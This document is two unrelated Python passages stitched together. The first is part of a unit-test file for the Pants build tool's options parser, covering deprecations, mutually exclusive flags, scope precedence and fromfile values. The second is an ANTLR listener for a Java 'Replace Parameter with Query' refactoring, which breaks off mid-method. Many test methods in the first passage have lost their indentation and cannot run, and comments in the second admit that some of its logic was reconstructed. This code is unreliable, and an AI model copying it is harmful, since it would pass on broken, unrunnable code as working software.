                    options.for_global_scope() if not scope else options.for_scope(scope)
                )
                assert getattr(scoped_options, option) == expected
                self.assertOptionWarning(w, option)

        # Via flags.
        assert_deprecation_triggered(
            flags="--global-crufty=crufty1", option="global_crufty", expected="crufty1",
        )
        assert_deprecation_triggered(
            flags="--global-crufty-boolean", option="global_crufty_boolean", expected=True,
        )
        assert_deprecation_triggered(
            flags="--no-global-crufty-boolean", option="global_crufty_boolean", expected=False,
        )
        assert_deprecation_triggered(
            flags="stale --crufty=stale_and_crufty",
            scope="stale",
            option="crufty",
            expected="stale_and_crufty",
        )
        # Scoped booleans warn in both spellings (scoped flag and scope-prefixed flag).
        assert_scoped_boolean_deprecation = partial(
            assert_deprecation_triggered, scope="stale", option="crufty_boolean"
        )
        assert_scoped_boolean_deprecation(flags="stale --crufty-boolean", expected=True)
        assert_scoped_boolean_deprecation(flags="stale --no-crufty-boolean", expected=False)
        assert_scoped_boolean_deprecation(flags="--stale-crufty-boolean", expected=True)
        assert_scoped_boolean_deprecation(flags="--no-stale-crufty-boolean", expected=False)
        # Via the environment.
        assert_deprecation_triggered(
            env={"PANTS_GLOBAL_CRUFTY": "crufty1"}, option="global_crufty", expected="crufty1",
        )
        assert_deprecation_triggered(
            env={"PANTS_STALE_CRUFTY": "stale_and_crufty"},
            scope="stale",
            option="crufty",
            expected="stale_and_crufty",
        )
        # Via config.
        assert_deprecation_triggered(
            config={"GLOBAL": {"global_crufty": "crufty1"}},
            option="global_crufty",
            expected="crufty1",
        )
        assert_deprecation_triggered(
            config={"stale": {"crufty": "stale_and_crufty"}},
            scope="stale",
            option="crufty",
            expected="stale_and_crufty",
        )
        # Make sure the warnings don't come out for regular options.
        with self.warnings_catcher() as w:
            self._parse(flags="stale --pants-foo stale --still-good")
            self.assertEqual(0, len(w))
    @unittest.mock.patch("pants.base.deprecated.PANTS_SEMVER", Version(_FAKE_CUR_VERSION))
    def test_delayed_deprecated_option(self) -> None:
        """With the running version pinned to _FAKE_CUR_VERSION: the first delayed
        deprecation produces no warning, while the one whose delay has presumably
        already elapsed warns immediately. Both still return the supplied value."""
        with self.warnings_catcher() as w:
            delayed_deprecation_option_value = (
                self._parse(flags="--global-delayed-deprecated-option=xxx")
                .for_global_scope()
                .global_delayed_deprecated_option
            )
            self.assertEqual(delayed_deprecation_option_value, "xxx")
            self.assertEqual(0, len(w))
        with self.warnings_catcher() as w:
            delayed_passed_option_value = (
                self._parse(flags="--global-delayed-but-already-passed-deprecated-option=xxx")
                .for_global_scope()
                .global_delayed_but_already_passed_deprecated_option
            )
            self.assertEqual(delayed_passed_option_value, "xxx")
            self.assertOptionWarning(w, "global_delayed_but_already_passed_deprecated_option")
def test_mutually_exclusive_options(self) -> None:
"""Ensure error is raised when mutual exclusive options are given together."""
def assert_mutually_exclusive_raised(
*,
flags: str,
scope: Optional[str] = None,
env: Optional[Dict[str, str]] = None,
config: Optional[Dict[str, Dict[str, str]]] = None,
) -> None:
with self.assertRaises(MutuallyExclusiveOptionError):
options = self._parse(flags=flags, env=env, config=config)
if scope:
options.for_scope(scope)
else:
options.for_global_scope()
assert_mutually_exclusive_raised(flags="--mutex-foo=foo --mutex-bar=bar")
assert_mutually_exclusive_raised(flags="--mutex-foo=foo --mutex-baz=baz")
assert_mutually_exclusive_raised(flags="--mutex-bar=bar --mutex-baz=baz")
assert_mutually_exclusive_raised(flags="--mutex-foo=foo --mutex-bar=bar --mutex-baz=baz")
assert_mutually_exclusive_raised(flags="--new-name=foo --old-name=bar")
assert_mutually_exclusive_raised(flags="--new-name=foo --old-name=bar")
assert_mutually_exclusive_raised(flags="stale --mutex-a=foo --mutex-b=bar", scope="stale")
assert_mutually_exclusive_raised(
flags="stale --crufty-new=foo --crufty-old=bar", scope="stale"
)
assert_mutually_exclusive_raised(flags="--mutex-foo=foo", env={"PANTS_MUTEX_BAR": "bar"})
assert_mutually_exclusive_raised(flags="--new-name=foo", env={"PANTS_OLD_NAME": "bar"})
assert_mutually_exclusive_raised(
flags="stale --mutex-a=foo", env={"PANTS_STALE_MUTEX_B": "bar"}, scope="stale",
)
assert_mutually_exclusive_raised(
flags="stale --crufty-new=foo", env={"PANTS_STALE_CRUFTY_OLD": "bar"}, scope="stale",
)
assert_mutually_exclusive_raised(
flags="--mutex-foo=foo", config={"GLOBAL": {"mutex_bar": "bar"}},
)
assert_mutually_exclusive_raised(
flags="--new-name=foo", config={"GLOBAL": {"old_name": "bar"}},
)
assert_mutually_exclusive_raised(
flags="stale --mutex-a=foo", config={"stale": {"mutex_b": "bar"}}, scope="stale",
)
assert_mutually_exclusive_raised(
flags="stale --crufty-old=foo", config={"stale": {"crufty_new": "bar"}}, scope="stale",
)
def assert_other_option_also_set(
*,
flags: str = "",
other_option: str,
scope: Optional[str] = None,
env: Optional[Dict[str, str]] = None,
config: Optional[Dict[str, Dict[str, str]]] = None,
) -> None:
options = self._parse(flags=flags, env=env, config=config)
scoped_options = options.for_global_scope() if not scope else options.for_scope(scope)
assert getattr(scoped_options, other_option) == "orz"
assert_other_option_also_set(flags="--mutex-foo=orz", other_option="mutex")
assert_other_option_also_set(flags="--old-name=orz", other_option="new_name")
assert_other_option_also_set(
flags="stale --mutex-a=orz", other_option="crufty_mutex", scope="stale",
)
assert_other_option_also_set(
flags="stale --crufty-old=orz", other_option="crufty_new", scope="stale",
)
assert_other_option_also_set(env={"PANTS_GLOBAL_MUTEX_BAZ": "orz"}, other_option="mutex")
assert_other_option_also_set(env={"PANTS_OLD_NAME": "orz"}, other_option="new_name")
assert_other_option_also_set(
env={"PANTS_STALE_MUTEX_B": "orz"}, other_option="crufty_mutex", scope="stale",
)
assert_other_option_also_set(
config={"stale": {"crufty_old": "orz"}}, other_option="crufty_new", scope="stale",
)
    def test_middle_scoped_options(self) -> None:
        """Make sure the rules for inheriting from a hierarchy of scopes hold.

        Values should follow
        1. A short circuit scan for a value from the following sources in-order:
           flags, env, config, hardcoded defaults
        2. Values for each source follow the . hierarchy scoping rule
           within that source.
        """
        # Short circuit using command line.
        options = self._parse(flags="--a=100 compile --a=99")
        self.assertEqual(100, options.for_global_scope().a)
        self.assertEqual(99, options.for_scope("compile").a)
        self.assertEqual(99, options.for_scope("compile.java").a)
        # Short circuit using config.
        options = self._parse(config={"DEFAULT": {"a": 100}, "compile": {"a": 99}})
        self.assertEqual(100, options.for_global_scope().a)
        self.assertEqual(99, options.for_scope("compile").a)
        self.assertEqual(99, options.for_scope("compile.java").a)
        # Short circuit using the environment.
        options = self._parse(env={"PANTS_A": "100", "PANTS_COMPILE_A": "99"})
        self.assertEqual(100, options.for_global_scope().a)
        self.assertEqual(99, options.for_scope("compile").a)
        self.assertEqual(99, options.for_scope("compile.java").a)
        # Command line has precedence over config.
        options = self._parse(flags="compile --a=99", config={"DEFAULT": {"a": 100}})
        self.assertEqual(100, options.for_global_scope().a)
        self.assertEqual(99, options.for_scope("compile").a)
        self.assertEqual(99, options.for_scope("compile.java").a)
        # Command line has precedence over environment.
        options = self._parse(flags="compile --a=99", env={"PANTS_A": "100"})
        self.assertEqual(100, options.for_global_scope().a)
        self.assertEqual(99, options.for_scope("compile").a)
        self.assertEqual(99, options.for_scope("compile.java").a)
        # Env has precedence over config.
        options = self._parse(config={"DEFAULT": {"a": 100}}, env={"PANTS_COMPILE_A": "99"})
        self.assertEqual(100, options.for_global_scope().a)
        self.assertEqual(99, options.for_scope("compile").a)
        self.assertEqual(99, options.for_scope("compile.java").a)
        # Command line global overrides the middle scope setting in the env.
        options = self._parse(flags="--a=100", env={"PANTS_COMPILE_A": "99"})
        self.assertEqual(100, options.for_global_scope().a)
        self.assertEqual(100, options.for_scope("compile").a)
        self.assertEqual(100, options.for_scope("compile.java").a)
        # Command line global overrides the middle scope in config.
        options = self._parse(flags="--a=100 ", config={"compile": {"a": 99}})
        self.assertEqual(100, options.for_global_scope().a)
        self.assertEqual(100, options.for_scope("compile").a)
        self.assertEqual(100, options.for_scope("compile.java").a)
        # Env global overrides the middle scope in config.
        options = self._parse(
            flags="--a=100 ", config={"compile": {"a": 99}}, env={"PANTS_A": "100"}
        )
        self.assertEqual(100, options.for_global_scope().a)
        self.assertEqual(100, options.for_scope("compile").a)
        self.assertEqual(100, options.for_scope("compile.java").a)
    def test_complete_scopes(self) -> None:
        """complete_scopes fills in every intermediate scope implied by the given leaves,
        and preserves any explicitly-provided scope infos (e.g. the global scope)."""
        self.assertEqual(
            {intermediate("foo"), intermediate("foo.bar"), task("foo.bar.baz")},
            set(Options.complete_scopes({task("foo.bar.baz")})),
        )
        self.assertEqual(
            {global_scope(), intermediate("foo"), intermediate("foo.bar"), task("foo.bar.baz")},
            set(Options.complete_scopes({GlobalOptions.get_scope_info(), task("foo.bar.baz")})),
        )
        self.assertEqual(
            {intermediate("foo"), intermediate("foo.bar"), task("foo.bar.baz")},
            set(Options.complete_scopes({intermediate("foo"), task("foo.bar.baz")})),
        )
        # Two independent leaves each get their own chain of intermediates.
        self.assertEqual(
            {
                intermediate("foo"),
                intermediate("foo.bar"),
                task("foo.bar.baz"),
                intermediate("qux"),
                task("qux.quux"),
            },
            set(Options.complete_scopes({task("foo.bar.baz"), task("qux.quux")})),
        )
    def test_get_fingerprintable_for_scope(self) -> None:
        """get_fingerprintable_for_scope returns (type, value) pairs for the scope,
        including recursive options inherited from enclosing scopes."""
        # Note: tests handling recursive and non-recursive options from enclosing scopes correctly.
        options = self._parse(
            flags='--store-true-flag --num=88 compile.scala --num=77 --modifycompile="blah blah blah" '
            '--modifylogs="durrrr" -- -d -v'
        )
        # NB: Passthrough args end up on our `--modifypassthrough` arg.
        pairs = options.get_fingerprintable_for_scope("compile.scala")
        self.assertEqual(
            [(str, "blah blah blah"), (str, ["-d", "-v"]), (bool, True), (int, 77)], pairs
        )
def test_fingerprintable(self) -> None:
options = self._parse(
flags="fingerprinting --fingerprinted=shall_be_fingerprinted "
"--definitely-not-fingerprinted=shant_be_fingerprinted"
)
pairs = options.get_fingerprintable_for_scope("fingerprinting")
self.assertIn((str, "shall_be_fingerprinted"), pairs)
self.assertNotIn((str, "shant_be_fingerprinted"), pairs)
def test_fingerprintable_inverted(self) -> None:
options = self._parse(
flags="fingerprinting --inverted=shall_be_fingerprinted "
"--definitely-not-inverted=shant_be_fingerprinted"
)
pairs = options.get_fingerprintable_for_scope(
"fingerprinting", fingerprint_key="daemon", invert=True
)
self.assertIn((str, "shall_be_fingerprinted"), pairs)
self.assertNotIn((str, "shant_be_fingerprinted"), pairs)
    def assert_fromfile(self, parse_func, expected_append=None, append_contents=None):
        """Shared fixture verifying `@<path>` fromfile expansion for several option types.

        Writes each test payload to a temp file, then parses via `parse_func`,
        which injects the `@<path>` reference through flags, config, or env
        (depending on the calling test), and checks the resulting option value.

        :param parse_func: callable ``(dest, fromfile_path) -> Options``.
        :param expected_append: expected value of the append-typed option
            (defaults to ``[1, 2, 42]``, the whole-default-list override case).
        :param append_contents: file contents for the append-typed option.
        """
        def _do_assert_fromfile(dest, expected, contents):
            # The temp file is closed before parsing so its contents are flushed to disk.
            with temporary_file(binary_mode=False) as fp:
                fp.write(contents)
                fp.close()
                options = parse_func(dest, fp.name)
                self.assertEqual(expected, options.for_scope("fromfile")[dest])

        _do_assert_fromfile(dest="string", expected="jake", contents="jake")
        _do_assert_fromfile(dest="intvalue", expected=42, contents="42")
        # Dict/list file contents are evaluated as Python literals.
        _do_assert_fromfile(
            dest="dictvalue",
            expected={"a": 42, "b": (1, 2)},
            contents=dedent(
                """
                {
                  'a': 42,
                  'b': (
                      1,
                      2
                  )
                }
                """
            ),
        )
        # NOTE(review): the list option's members are stringified ("1", not 1) — this
        # matches the option's registered member type; confirm against registration.
        _do_assert_fromfile(
            dest="listvalue",
            expected=["a", "1", "2"],
            contents=dedent(
                """
                ['a',
                 1,
                 2]
                """
            ),
        )
        expected_append = expected_append or [1, 2, 42]
        append_contents = append_contents or dedent(
            """
            [
             1,
             2,
             42
            ]
            """
        )
        _do_assert_fromfile(dest="appendvalue", expected=expected_append, contents=append_contents)
def test_fromfile_flags(self) -> None:
def parse_func(dest, fromfile):
return self._parse(flags=f"fromfile --{dest.replace('_', '-')}=@{fromfile}")
# You can only append a single item at a time with append flags, ie: we don't override the
# default list like we do with env of config. As such, send in a single append value here
# instead of a whole default list as in `test_fromfile_config` and `test_fromfile_env`.
self.assert_fromfile(parse_func, expected_append=[42], append_contents="42")
def test_fromfile_config(self) -> None:
def parse_func(dest, fromfile):
return self._parse(flags="fromfile", config={"fromfile": {dest: f"@{fromfile}"}})
self.assert_fromfile(parse_func)
def test_fromfile_env(self) -> None:
def parse_func(dest, fromfile):
return self._parse(
flags="fromfile", env={f"PANTS_FROMFILE_{dest.upper()}": f"@{fromfile}"}
)
self.assert_fromfile(parse_func)
def test_fromfile_json(self) -> None:
val = {"a": {"b": 1}, "c": [2, 3]}
with temporary_file(suffix=".json", binary_mode=False) as fp:
json.dump(val, fp)
fp.close()
options = self._parse(flags=f"fromfile --{'dictvalue'}=@{fp.name}")
self.assertEqual(val, options.for_scope("fromfile")["dictvalue"])
def test_fromfile_yaml(self) -> None:
val = {"a": {"b": 1}, "c": [2, 3]}
with temporary_file(suffix=".yaml", binary_mode=False) as fp:
yaml.safe_dump(val, fp)
fp.close()
options = self._parse(flags=f"fromfile --{'dictvalue'}=@{fp.name}")
self.assertEqual(val, options.for_scope("fromfile")["dictvalue"])
def test_fromfile_error(self) -> None:
options = self._parse(flags="fromfile --string=@/does/not/exist")
with self.assertRaises(FromfileError):
options.for_scope("fromfile")
def test_fromfile_escape(self) -> None:
options = self._parse(flags=r"fromfile --string=@@/does/not/exist")
self.assertEqual("@/does/not/exist", options.for_scope("fromfile").string)
def test_ranked_value_equality(self) -> None:
none = RankedValue(Rank.NONE, None)
some = RankedValue(Rank.HARDCODED, "some")
self.assertEqual(RankedValue(Rank.NONE, None), none)
self.assertEqual(RankedValue(Rank.HARDCODED, "some"), some)
self.assertNotEqual(some, none)
self.assertEqual(some, RankedValue(Rank.HARDCODED, "some"))
self.assertNotEqual(some, RankedValue(Rank.HARDCODED, "few"))
self.assertNotEqual(some, RankedValue(Rank.CONFIG, "some"))
    def test_pants_global_designdoc_example(self) -> None:
        """Walk through the precedence example from the options design doc.

        Exercises flag > env > config ranking and inheritance of values down
        the scope hierarchy (GLOBAL -> compile -> compile.java).
        """
        # The example from the design doc.
        # Get defaults from config and environment.
        config = {
            "GLOBAL": {"b": "99"},
            "compile": {"a": "88", "c": "77"},
        }
        env = {"PANTS_COMPILE_C": "66"}
        options = self._parse(
            flags="--a=1 compile --b=2 compile.java --a=3 --c=4", env=env, config=config,
        )
        # Global scope: `a` from the global flag, `b` from GLOBAL config.
        self.assertEqual(1, options.for_global_scope().a)
        self.assertEqual(99, options.for_global_scope().b)
        # `c` has no value in the global scope at all.
        with self.assertRaises(AttributeError):
            options.for_global_scope().c
        # `compile`: inherits the global flag --a=1 (flag rank beats the config
        # value 88), takes --b=2 from its own flags, and the env var (66) beats
        # the config value (77) for `c`.
        self.assertEqual(1, options.for_scope("compile").a)
        self.assertEqual(2, options.for_scope("compile").b)
        self.assertEqual(66, options.for_scope("compile").c)
        # `compile.java`: overrides `a` and `c` with its own flags, inherits `b`.
        self.assertEqual(3, options.for_scope("compile.java").a)
        self.assertEqual(2, options.for_scope("compile.java").b)
        self.assertEqual(4, options.for_scope("compile.java").c)
    def test_invalid_option_errors(self) -> None:
        """Unrecognized flags raise ParseError with edit-distance-based suggestions."""
        self.maxDiff = None

        def parse_joined_command_line(*args):
            # Bootstrap options supply the edit distance used when searching for
            # misspelled-option suggestions.
            bootstrap_options = create_options(
                {
                    GLOBAL_SCOPE: {
                        # Set the Levenshtein edit distance to search for misspelled options.
                        "option_name_check_distance": 2,
                        # If bootstrap option values are provided, this option is accessed and must be provided.
                        "spec_files": [],
                    },
                }
            )
            return self._parse(
                flags=safe_shlex_join(list(args)),
                bootstrap_option_values=bootstrap_options.for_global_scope(),
            )

        # One unknown flag with no close match: no suggestions section.
        with self.assertRaisesWithMessage(
            ParseError,
            (
                "Unrecognized command line flag '--aasdf' on global scope.\n\n(Run `./pants "
                "help-advanced` for all available options.)"
            ),
        ):
            parse_joined_command_line("--aasdf").for_global_scope()

        # Multiple unknown flags are reported together in one message.
        with self.assertRaisesWithMessage(
            ParseError,
            (
                "Unrecognized command line flags on global scope: --aasdf, --aasdy.\n\n(Run "
                "`./pants help-advanced` for all available options.)"
            ),
        ):
            parse_joined_command_line("--aasdf", "--aasdy").for_global_scope()

        with self.assertRaisesWithMessage(
            ParseError,
            dedent(
                """\
                Unrecognized command line flags on global scope: -v, --config-overridden, --c.
                Suggestions:
                -v: [--v2, --verbose, --a, --b, --y, -n, -z, --compile-c]
                --config-overridden: [--config-override]
                --c: [--compile-c, --compile-scala-modifycompile, --compile-scala-modifylogs, --compile-scala-modifypassthrough, --config-override, --a, --b, --y, -n, -z, --v2]

                (Run `./pants help-advanced` for all available options.)"""
            ),
        ):
            parse_joined_command_line(
                # A nonexistent short-form option -- other short-form options should be displayed.
                "-vd",
                # An incorrect form of `--config-override=val` (`ridden` instead of `ride`) should
                # show the correct option name.
                "--config-overridden=val",
                # An option name without the correct prefix scope should match all flags with the
                # same or similar unscoped option names.
                "--c=[]",
            ).for_global_scope()

        # Test when only some flags have suggestions.
        with self.assertRaisesWithMessage(
            ParseError,
            (
                "Unrecognized command line flags on global scope: --aasdf, --config-overridden.\n"
                "Suggestions:\n"
                "--config-overridden: [--config-override]\n\n"
                "(Run `./pants help-advanced` for all available options.)"
            ),
        ):
            parse_joined_command_line("--aasdf", "--config-overridden").for_global_scope()

        with self.assertRaisesWithMessage(
            ParseError,
            dedent(
                """\
                Unrecognized command line flag '--sam' on scope 'simple'. Suggestions:
                --simple-spam, --simple-dashed-spam, --a, --num, --scoped-a-bit-spam, --scoped-and-dashed-spam

                (Run `./pants help-advanced simple` for all available options.)"""
            ),
        ):
            parse_joined_command_line(
                # Verify that misspelling searches work for options in non-global scopes.
                "--simple-sam=val",
            ).for_scope("simple")

        with self.assertRaisesWithMessage(
            ParseError,
            dedent(
                """\
                Unrecognized command line flag '--modifylogs' on scope 'compile'. Suggestions:
                --compile-scala-modifylogs

                (Run `./pants help-advanced compile` for all available options.)"""
            ),
        ):
            parse_joined_command_line(
                # Verify that options with too shallow scoping match the correct option.
                "--compile-modifylogs=val",
            ).for_scope("compile")

        with self.assertRaisesWithMessage(
            ParseError,
            dedent(
                """\
                Unrecognized command line flag '--modifylogs' on scope 'cache.compile.scala'.
                Suggestions:
                --compile-scala-modifylogs

                (Run `./pants help-advanced cache.compile.scala` for all available options.)"""
            ),
        ):
            parse_joined_command_line(
                # Verify that options with too deep scoping match the correct option.
                "--cache-compile-scala-modifylogs=val",
            ).for_scope("cache.compile.scala")
def test_pants_global_with_default(self) -> None:
"""This test makes sure values under [DEFAULT] still gets read."""
# This cast shouldn't be necessary - likely a bug in MyPy. Once this gets fixed, MyPy will
# tell us that we can remove the cast.
config = cast(
Dict[str, Dict[str, Any]], {"DEFAULT": {"b": "99"}, "GLOBAL": {"store_true_flag": True}}
)
global_options = self._parse(config=config).for_global_scope()
self.assertEqual(99, global_options.b)
self.assertTrue(global_options.store_true_flag)
def test_double_registration(self) -> None:
options = Options.create(
env={},
config=self._create_config(),
known_scope_infos=OptionsTest._known_scope_infos,
args=shlex.split("./pants"),
)
options.register(GLOBAL_SCOPE, "--foo-bar")
with self.assertRaises(OptionAlreadyRegistered):
options.register(GLOBAL_SCOPE, "--foo-bar")
def test_enum_serializability(self) -> None:
# We serialize options to JSON e.g., when uploading stats.
# This test spot-checks that enum types can be serialized.
options = self._parse(flags="enum-opt --some-enum=another-value")
json.dumps({"foo": [options.for_scope("enum-opt").as_dict()]}, cls=CoercingEncoder)
    def test_scope_deprecation(self) -> None:
        """Two new scopes may deprecate (and thereby split) the same old scope.

        Values found under the deprecated scope are honored with a
        DeprecationWarning, and rank ordering still applies between the old
        and new scope names.
        """
        # Note: This test demonstrates that two different new scopes can deprecate the same
        # old scope. I.e., it's possible to split an old scope's options among multiple new scopes.
        class DummyOptionable1(Optionable):
            options_scope = "new-scope1"
            options_scope_category = ScopeInfo.SUBSYSTEM
            deprecated_options_scope = "deprecated-scope"
            deprecated_options_scope_removal_version = "9999.9.9.dev0"

        class DummyOptionable2(Optionable):
            options_scope = "new-scope2"
            options_scope_category = ScopeInfo.SUBSYSTEM
            deprecated_options_scope = "deprecated-scope"
            deprecated_options_scope_removal_version = "9999.9.9.dev0"

        options = Options.create(
            env={},
            config=self._create_config(
                {
                    "GLOBAL": {"inherited": "aa"},
                    DummyOptionable1.options_scope: {"foo": "xx"},
                    DummyOptionable1.deprecated_options_scope: {
                        "foo": "yy",
                        "bar": "zz",
                        "baz": "ww",
                        "qux": "uu",
                    },
                }
            ),
            known_scope_infos=[
                global_scope(),
                DummyOptionable1.get_scope_info(),
                DummyOptionable2.get_scope_info(),
            ],
            args=shlex.split("./pants --new-scope1-baz=vv"),
        )
        options.register(GLOBAL_SCOPE, "--inherited")
        options.register(DummyOptionable1.options_scope, "--foo")
        options.register(DummyOptionable1.options_scope, "--bar")
        options.register(DummyOptionable1.options_scope, "--baz")
        options.register(DummyOptionable2.options_scope, "--qux")

        with self.warnings_catcher() as w:
            vals1 = options.for_scope(DummyOptionable1.options_scope)

        # Check that we got a warning, but not for the inherited option.
        single_warning_dummy1 = assert_single_element(w)
        self.assertEqual(single_warning_dummy1.category, DeprecationWarning)
        self.assertNotIn("inherited", str(single_warning_dummy1.message))

        # Check values.
        # Deprecated scope takes precedence at equal rank (both set in config).
        self.assertEqual("yy", vals1.foo)
        self.assertEqual("zz", vals1.bar)
        # New scope takes precedence at higher rank (flag beats deprecated config).
        self.assertEqual("vv", vals1.baz)

        with self.warnings_catcher() as w:
            vals2 = options.for_scope(DummyOptionable2.options_scope)

        # Check that we got a warning.
        single_warning_dummy2 = assert_single_element(w)
        self.assertEqual(single_warning_dummy2.category, DeprecationWarning)
        self.assertNotIn("inherited", str(single_warning_dummy2.message))

        # Check values.
        self.assertEqual("uu", vals2.qux)
    def test_scope_deprecation_parent(self) -> None:
        """A scope may deprecate a subscope that belongs to a *different* scope."""
        # Note: This test demonstrates that a scope can mark itself as deprecating a subscope of
        # another scope.
        class DummyOptionable1(Optionable):
            options_scope = "test"
            options_scope_category = ScopeInfo.SUBSYSTEM

            @classmethod
            def register_options(cls, register):
                super().register_options(register)
                register("--bar")

        class DummyOptionable2(Optionable):
            options_scope = "lint"
            options_scope_category = ScopeInfo.SUBSYSTEM
            # Deprecates a subscope of DummyOptionable1's "test" scope.
            deprecated_options_scope = "test.a-bit-linty"
            deprecated_options_scope_removal_version = "9999.9.9.dev0"

            @classmethod
            def register_options(cls, register):
                super().register_options(register)
                register("--foo")

        known_scope_infos = (
            [global_scope()]
            + list(DummyOptionable1.known_scope_infos())
            + list(DummyOptionable2.known_scope_infos())
        )

        options = Options.create(
            env={},
            config=self._create_config(),
            known_scope_infos=known_scope_infos,
            # The value arrives via the deprecated subscope's flag name.
            args=shlex.split("./pants --test-a-bit-linty-foo=vv"),
        )

        # NB: Order matters here, because Optionables are typically registered in sorted order.
        DummyOptionable2.register_options_on_scope(options)
        DummyOptionable1.register_options_on_scope(options)

        with self.warnings_catcher() as w:
            vals = options.for_scope(DummyOptionable2.options_scope)

        # Check that we got a warning, but also the correct value.
        single_warning_dummy1 = assert_single_element(w)
        self.assertEqual(single_warning_dummy1.category, DeprecationWarning)
        self.assertEqual("vv", vals.foo)
    def test_scope_deprecation_defaults(self) -> None:
        """A [DEFAULT] value must not trigger a deprecated-scope warning."""
        # Confirms that a DEFAULT option does not trigger deprecation warnings for a deprecated scope.
        class DummyOptionable1(Optionable):
            options_scope = "new-scope1"
            options_scope_category = ScopeInfo.SUBSYSTEM
            deprecated_options_scope = "deprecated-scope"
            deprecated_options_scope_removal_version = "9999.9.9.dev0"

        options = Options.create(
            env={},
            config=self._create_config(
                # `foo` is set both via DEFAULT and via the new scope itself.
                {"DEFAULT": {"foo": "aa"}, DummyOptionable1.options_scope: {"foo": "xx"}}
            ),
            known_scope_infos=[global_scope(), DummyOptionable1.get_scope_info()],
            args=shlex.split("./pants"),
        )
        options.register(DummyOptionable1.options_scope, "--foo")

        with self.warnings_catcher() as w:
            vals1 = options.for_scope(DummyOptionable1.options_scope)

        # Check that we got no warnings and that the actual scope took precedence.
        self.assertEqual(0, len(w))
        self.assertEqual("xx", vals1.foo)
    def test_scope_dependency_deprecation(self) -> None:
        """A scoped dependency (subscope) can itself carry a removal version."""
        # Test that a dependency scope can be deprecated.
        class DummyOptionable1(Optionable):
            options_scope = "scope"
            options_scope_category = ScopeInfo.SUBSYSTEM

        options = Options.create(
            env={},
            config=self._create_config(),
            known_scope_infos=[
                global_scope(),
                DummyOptionable1.get_scope_info(),
                # A deprecated, scoped dependency on `DummyOptionable1`. This
                # imitates the construction of SubsystemClientMixin.known_scope_infos.
                ScopeInfo(
                    DummyOptionable1.subscope("sub"),
                    ScopeInfo.SUBSYSTEM,
                    DummyOptionable1,
                    removal_version="9999.9.9.dev0",
                    removal_hint="Sayonara!",
                ),
            ],
            args=shlex.split("./pants --scope-sub-foo=vv"),
        )
        options.register(DummyOptionable1.options_scope, "--foo")

        with self.warnings_catcher() as w:
            # Accessing the deprecated subscope should warn but still resolve.
            vals1 = options.for_scope(DummyOptionable1.subscope("sub"))

        # Check that we got a warning, but also the correct value.
        single_warning_dummy1 = assert_single_element(w)
        self.assertEqual(single_warning_dummy1.category, DeprecationWarning)
        self.assertEqual("vv", vals1.foo)
|
from antlr4 import *
from antlr4.TokenStreamRewriter import TokenStreamRewriter
from gen.java.JavaLexer import JavaLexer
from gen.javaLabeled.JavaParserLabeled import JavaParserLabeled
from gen.javaLabeled.JavaParserLabeledListener import JavaParserLabeledListener
# Method parameters are obtained with formalParameters().formalParameterList().
# Formal parameters are the ones that appear in the method declaration;
# parameters at a method call site come from expressionList/expression.
"""
To implement the Replace Parameter with Query refactoring:
taking the removable parameters into account, find the new object in the method declaration,
delete the target parameters in both the method call and the declaration,
and insert the removed parameters into the method body.
"""
class ReplaceParameterWithQueryListener(JavaParserLabeledListener):
    """ANTLR listener for the "Replace Parameter with Query" refactoring.

    For the target method (or constructor) of the target class this listener:
      * strips the target parameters from every call site and from the
        declaration, and
      * re-introduces each removed parameter as a local variable at the top of
        the method body, initialized as a query on the surviving "object"
        parameter.
    """

    # constructor
    def __init__(self, common_token_stream: CommonTokenStream = None,
                 target_class: str = None, target_method: str = None,
                 target_parameters: list = None):
        """Validate inputs and initialize traversal state.

        :param common_token_stream: token stream of the parsed file (required).
        :param target_class: name of the class owning the method (required).
        :param target_method: name of the method/constructor to refactor (required).
        :param target_parameters: zero-based indices of the parameters to replace.
        :raises ValueError: if a required argument is None.
        """
        if common_token_stream is None:
            raise ValueError("common token stream is None")
        self.token_stream_rewriter = TokenStreamRewriter(common_token_stream)
        if target_class is None:
            raise ValueError("target class is None")
        self.target_class = target_class
        if target_method is None:
            raise ValueError("target method is None")
        self.target_method = target_method
        self.target_parameters = [] if target_parameters is None else target_parameters

        # --- traversal state ---
        self.current_class = None          # name of the class being visited
        self.current_method = None         # name of the method being visited
        self.current_method_call = None    # name of the method call being visited
        self.target_method_obj = None      # declaration ctx of the target method
        self.removed_expressions = []      # argument ctxs removed from call sites
        self.local_variables = []          # local-variable-declaration ctxs in scope
        self.add_to_target_method = []     # initializer texts to insert into the body
        self.index_of_parameter = 0        # index of the "object" parameter

    def enterClassDeclaration(self, ctx: JavaParserLabeled.ClassDeclarationContext):
        self.current_class = ctx.IDENTIFIER().getText()

    def exitClassDeclaration(self, ctx: JavaParserLabeled.ClassDeclarationContext):
        self.current_class = None

    def enterMethodDeclaration(self, ctx: JavaParserLabeled.MethodDeclarationContext):
        self.current_method = ctx.IDENTIFIER().getText()
        if self.current_method == self.target_method and self.current_class == self.target_class:
            self.target_method_obj = ctx

    def exitMethodDeclaration(self, ctx: JavaParserLabeled.MethodDeclarationContext):
        self.FindObjrctIndex()

    def enterConstructorDeclaration(self, ctx: JavaParserLabeled.ConstructorDeclarationContext):
        self.current_method = ctx.IDENTIFIER().getText()
        if self.current_method == self.target_method and self.current_class == self.target_class:
            self.target_method_obj = ctx

    def exitConstructorDeclaration(self, ctx: JavaParserLabeled.ConstructorDeclarationContext):
        self.FindObjrctIndex()

    def FindObjrctIndex(self):
        """Process the arguments removed from call sites in this method.

        Bare-identifier arguments get their local declaration deleted via
        ``removeExpression``; other expressions are queued for re-insertion
        into the target method body.

        NOTE: the method name keeps its historical typo ("Objrct") so any
        external callers are unaffected.
        """
        i = 0
        for expression in self.removed_expressions:
            if type(expression) is JavaParserLabeled.Expression0Context and \
                    type(expression.primary()) is JavaParserLabeled.Primary4Context:
                # A bare identifier: delete its local declaration instead.
                self.removeExpression(expression)
            else:
                self.add_to_target_method.append(expression.getText())
            # find index of target object
            # NOTE(review): placement reconstructed from mangled indentation;
            # this leaves index_of_parameter at the last removed expression's
            # index -- confirm against the original intent.
            self.index_of_parameter = i
            i += 1
        # Reset per-method state for the next declaration.
        self.removed_expressions = []
        self.local_variables = []
        self.current_method = None

    def enterLocalVariableDeclaration(self, ctx: JavaParserLabeled.LocalVariableDeclarationContext):
        # BUG FIX: keep the ctx itself rather than ctx.getText().
        # removeExpression() calls .variableDeclarators() on these entries,
        # which raised AttributeError on a plain str.
        self.local_variables.append(ctx)

    # delete in method call
    def removeExpression(self, expression):
        """Delete the local-variable declarator matching `expression`.

        If it is the only declarator, the whole declaration statement is
        deleted; otherwise the declarator list is rewritten without it. The
        matched declarator's initializer text is queued for the method body.
        """
